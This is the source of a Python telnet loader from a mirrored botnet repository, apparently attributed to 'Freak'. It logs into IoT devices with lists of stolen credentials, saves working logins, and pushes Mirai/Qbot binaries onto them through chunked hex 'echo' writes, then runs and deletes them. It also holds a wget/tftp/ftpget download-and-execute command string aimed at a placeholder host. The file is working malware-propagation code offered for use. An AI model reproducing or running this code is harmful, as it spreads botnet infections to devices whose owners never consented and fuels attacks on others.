Mirrors/TL-BOTS
6
0
Fork 0
mirror of https://github.com/threatland/TL-BOTS synced 2024-06-25 16:30:09 +00:00
Code Issues Projects Releases Wiki Activity
master
TL-BOTS/TL.EXPLOIT_SCAN/SCANNER.Telnet/PY_LOADER/mirai_telnet_echoload.0a031f.py
young thug 9ba773b5e1 Commit TL-BOTS
2019-10-02 16:41:26 -04:00

293 lines
11 KiB
Python
Executable File
Raw Permalink Blame History

#!/usr/bin/python
#Phaaaat hax telnet loader by Freak/Milenko
import sys, re, os, socket, time, select
from threading import Thread
rekdevice = "cd /tmp || cd /home/$USER || cd /var/run || cd /mnt || cd /root || cd /; wget http://0.0.0.0/update.sh; busybox wget http://0.0.0.0/update.sh; tftp -r update.sh -g 0.0.0.0; busybox tftp -r update.sh -g 0.0.0.0; ftpget -v -u anonymous -p anonymous -P 21 0.0.0.0 update.sh update.sh; busybox ftpget -v -u anonymous -p anonymous -P 21 0.0.0.0 update.sh update.sh; chmod 777 update.sh; busybox chmod 777 update.sh; sh update.sh; rm -rf update.sh"
if len(sys.argv) < 2:
sys.exit("\033[37mUsage: python "+sys.argv[0]+" [vuln list]")
print "\033[31m"
print "S-S-SUUUPER fast telnet echoloader by Freak"
print
print "Reads ip:port user:pass and simply checks the IP for port 23 then echoloads mirai/qbot binaries"
print "ensure the binaries are in the \"bins\" directory under the proper dlr.ARCH filenames."
print "All working telnets are saved to \"bots.txt\""
threads = int(raw_input("Threads: "))
lines = open(sys.argv[1],"r").readlines()
import random
random.shuffle(lines)
global fh
fh = open("bots.txt","a+")
def chunkify(lst,n):
return [ lst[i::n] for i in xrange(n) ]
running = 0
global echo
global tftp
global wget
global logins
global ran
tftp = 0
wget = 0
echo = 0
logins = 0
ran = 0
def printStatus():
global echo
global tftp
global wget
global logins
global ran
while 1:
time.sleep(5)
print "\033[32m[\033[31m+\033[32m] Logins: " + str(logins) + " Ran:" + str(ran) + " Echoes:" + str(echo) + " Wgets:" + str(wget) + " TFTPs:" + str(tftp) + "\033[37m"
def readUntil(tn, advances, timeout=8):
buf = ''
start_time = time.time()
while time.time() - start_time < timeout:
buf += tn.recv(1024)
time.sleep(0.1)
for advance in advances:
if advance in buf: return buf
return ""
def recvTimeout(sock, size, timeout=8):
sock.setblocking(0)
ready = select.select([sock], [], [], timeout)
if ready[0]:
data = sock.recv(size)
return data
return ""
def contains(data, array):
for test in array:
if test in data:
return True
return False
def split_bytes(s, n):
assert n >= 4
start = 0
lens = len(s)
while start < lens:
if lens - start <= n:
yield s[start:]
return # StopIteration
end = start + n
assert end > start
yield s[start:end]
start = end
def infect(ip, username, password):
global echo
global tftp
global wget
global logins
global ran
infectedkey = "CAPSAICIN"
try:
tn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tn.settimeout(0.5)
tn.connect((ip, 23))
except:
try:
tn.close()
except:
pass
return
try:
hoho = ''
hoho += readUntil(tn, ":")
if ":" in hoho:
tn.send(username + "\n")
time.sleep(0.1)
hoho = ''
hoho += readUntil(tn, ":")
if ":" in hoho:
tn.send(password + "\n")
time.sleep(0.8)
else:
pass
prompt = ''
prompt += recvTimeout(tn, 8192)
if ">" in prompt and "ONT" not in prompt:
success = True
elif "#" in prompt or "$" in prompt or "@" in prompt or ">" in prompt:
success = True
else:
tn.close()
return
except:
tn.close()
return
if success == True:
try:
tn.send("enable\r\n")
tn.send("system\r\n")
tn.send("shell\r\n")
tn.send("sh\r\n")
tn.send("echo -e '\\x41\\x4b\\x34\\x37'\r\n")
except:
tn.close()
return
time.sleep(1)
try:
buf = recvTimeout(tn, 8192)
except:
tn.close()
return
if "AK47" in buf:
print "\033[32m[\033[31m+\033[32m] \033[33mGOTCHA \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, ip)
logins += 1
fh.write(ip + ":23 " + username + ":" + password + "\n")
fh.flush()
# tn.send(rekdevice + "\r\n")
# time.sleep(15)
buf = "" #recvTimeout(tn, 1024*1024)
loaded = False
if "bytes" in buf:
print "\033[32m[\033[31m+\033[32m] \033[33mTFTP \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, ip)
tftp += 1
loaded = True
elif "saved" in buf:
print "\033[32m[\033[31m+\033[32m] \033[33mWGET \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, ip)
wget += 1
loaded = True
if infectedkey in buf:
ran += 1
print "\033[32m[\033[31m+\033[32m] \033[35mINFECTED \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, ip)
f=open("infected.txt", "a")
f.write(ip +":23 " + username + ":" + password + "\r\n")
f.close()
if loaded:
tn.close()
return
tn.send("cd /tmp || cd /home/$USER || cd /var/run || cd /mnt || cd /root || cd /\r\n")
tn.send("cat /proc/mounts||busybox cat /proc/mounts\r\n")
mounts = recvTimeout(tn, 1024*1024)
for line in mounts.split("\n"):
try:
path = line.split(" ")[1]
if " rw" in line:
tn.send("echo -e '%s' > %s/.keksec||busybox echo -e '%s' > %s/.keksec; cat %s/.keksec||busybox cat %s/.keksec; rm %s/.keksec||busybox rm %s/.keksec\r\n" % ("\\x41\\x4b\\x34\\x37", path, "\\x41\\x4b\\x34\\x37", path, path, path, path, path))
if "AK47" in recvTimeout(tn, 1024*1024):
tn.send("cd %s\r\n" % path) #cd into the writeable directory
except:
continue
for binary in "dlr.arm dlr.arm7 dlr.mips dlr.ppc dlr.x86 dlr.m68k dlr.mpsl dlr.sh4 dlr.spc".split(" "):
binloaded = False
while binloaded == False:
try:
first = True
count = 0
hexdata = []
for chunk in split_bytes(open("bins/" + binary, "rb").read(), 128):
hexdata.append(''.join(map(lambda c:'\\x%02x'%c, map(ord, chunk))))
parts = len(hexdata)
for hexchunk in hexdata:
seq = ">" if first else ">>"
tn.send("echo -ne '" + hexchunk + "' " + seq + " updDl\r\n")
first = False
count += 1
time.sleep(0.01)
print "\033[32m[\033[31m+\033[32m] \033[33mECHO \033[31m---> \033[32m" + ip + " \033[31m---> \033[36m(" + str(count) + "/" + str(parts) + ") " + binary + "\033[37m"
tn.send("chmod 777 updDl||busybox chmod 777 updDl\r\n")
tn.send("./updDl\r\n")
time.sleep(3)
tn.send("rm -rf ./updDl\r\n")
time.sleep(0.1)
tn.send("./dvrHelper\r\n")
time.sleep(1)
tn.send("rm -rf ./dvrHelper\r\n")
time.sleep(0.1)
buf = recvTimeout(tn, 1024*1024)
if "FIN" in buf:
echo += 1
print "\033[32m[\033[31m+\033[32m] \033[33mECHOLOADED \033[31m---> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[31m ---> \033[35m%s\033[37m" %(username, password, ip, binary)
tn.close()
f=open("echoes.txt","a")
f.write(ip +":23 " + username + ":" + password + "\r\n")
f.close()
return
if infectedkey in buf:
ran += 1
f=open("infected.txt", "a")
f.write(ip +":23 " + username + ":" + password + "\r\n")
f.close()
print "\033[32m[\033[31m+\033[32m] \033[35mINFECTED \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, ip)
tn.close()
return
binloaded = True
except:
pass
else:
tn.close()
return
def check(chunk, fh):
global running
running += 1
threadID = running
for login in chunk:
try:
if ":23 " in login:
login = login.replace(":23 ", ":")
if ":2323 " in login:
login = login.replace(":2323 ", ":")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(0.5)
try:
socket.inet_aton(login.split(":")[0])
ip = login.split(":")[0]
username = login.split(":")[1]
password = login.split(":")[2]
except:
try:
socket.inet_aton(login.split(":")[2])
ip = login.split(":")[2]
username = login.split(":")[0]
password = login.split(":")[1]
except:
continue
s.connect((ip, 23))
s.close()
infect(ip, username, password)
except:
pass
print "\033[32m[\033[31m+\033[32m] Thread " + str(threadID) + " has finished scanning " + str(len(chunk)) + " IPs."
running -= 1
lines = map(lambda s: s.strip(), lines) # remove all newlines
import random
random.shuffle(lines)
chunks = chunkify(lines, threads) # make seperate chunk for each thread
print "STARTING SCAN AND LOAD!!!"
Thread(target = printStatus, args = ()).start()
for thread in xrange(0,threads):
if thread >= 384:
time.sleep(0.2)
try:
Thread(target = check, args = (chunks[thread], fh,)).start()
except:
pass
print "Scanning... Press enter 3 times to stop."
for i in range(0,3):
raw_input()
fh.close()
os.kill(os.getpid(), 9)
Reference in New Issue View Git Blame Copy Permalink